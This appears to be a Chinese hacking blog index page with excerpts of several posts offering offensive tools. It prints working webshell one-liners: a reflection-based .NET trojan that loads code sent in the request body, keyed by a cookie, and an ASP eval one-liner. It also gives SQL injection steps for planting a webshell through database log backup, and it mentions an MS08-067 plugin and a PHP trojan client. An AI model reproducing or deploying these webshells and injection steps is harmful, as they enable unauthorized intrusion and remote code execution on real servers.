鬼仔's Blog

作者：cnqing

ASPXshell MS08-067插件
感谢hi群众兄测试，附赠几个插件。。。
1.扫可写目录插件
使用方法：设置扫描起始目录，设置扫描成功N个后停止，扫描。
阅读全文 »

鬼仔注：刚从外面回来，看到cnqing在gtalk上给我的留言，只扔给一个链接。

作者：cnqing

软件说明：
程序包 包括一个基于反射的.net 一句话木马。

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

客户端 当前插件
文件管理
.net探针
CMDshell
端口转发
阅读全文 »

来源：s0n9 '5 b109

<%eval(request("a")):response.end%> 备分专用一句话
加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.

日志备分WEBSHELL标准的七步:

1.InjectionURL';alter database XXX set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)

2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表)

3.InjectionURL';backup log XXX to disk = 'c:\cmd' with init-- (减少备分数据的大小)
阅读全文 »

作者：云杉
信息来源：火狐技术联盟


ZV新型PHP一句话木马客户端GUI版(Include利用方式) by 执着我一生[F.S.T]
=============
说明
=============
1. 说起写这个东西，我是看了ZV大大的《一种关于一句话木马的更新思想》这篇文章后，向我等这样的菜鸟利用起来确实挺麻烦，所以就有了这个工具。工具写的垃圾，有的功能实现不了，拿不出手啊。。。
愿意用的就用吧，高手可以飘过了：）

原始的文章地址：
http://my.opera.com/zvrop/blog/show.dml/394634
阅读全文 »